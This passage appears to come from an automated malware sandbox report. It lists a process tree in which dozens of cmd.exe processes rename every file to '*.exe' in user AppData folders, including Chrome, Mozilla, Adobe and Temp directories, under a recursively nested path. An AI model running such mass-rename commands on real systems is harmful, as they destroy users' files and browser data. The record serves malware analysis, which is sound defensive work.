          • cmd.exe (PID: 7372 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1272 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1856 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5708 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 764 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 828 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5532 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7904 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6652 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7988 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7888 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3160 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6492 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2940 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8116 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5632 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2360 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6512 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3332 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8084 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrobat_sbx\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1772 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrocef_low\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6788 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrord32_super_sbx\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6624 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\CB7D.tmp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2680 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Diagnostics\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5488 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1090636871\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7756 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1191663050\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1234978473\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1289371347\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2928 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1318414972\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3480 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1421574262\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1485273224\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1619438387\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2924 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1635976352\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3500 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1693012001\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6704 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1807723660\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1959985254\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3596 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_1988346647\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_27162369\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4336 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_339006160\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_649288342\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3124 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_736602331\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5988 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_778675694\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4524 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\edge_BITS_6440_995017740\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2616 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\mozilla-temp-files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7592 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\msedge_url_fetcher_2640_817343797\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\msedge_url_fetcher_5172_1791500899\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1880 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\msedge_url_fetcher_5172_761252224\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5080 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4724 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5136 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\Dictionaries\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7760 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3032 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\f4d41c5d09ae781\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8032 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2468 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\AutofillStates\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7404 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
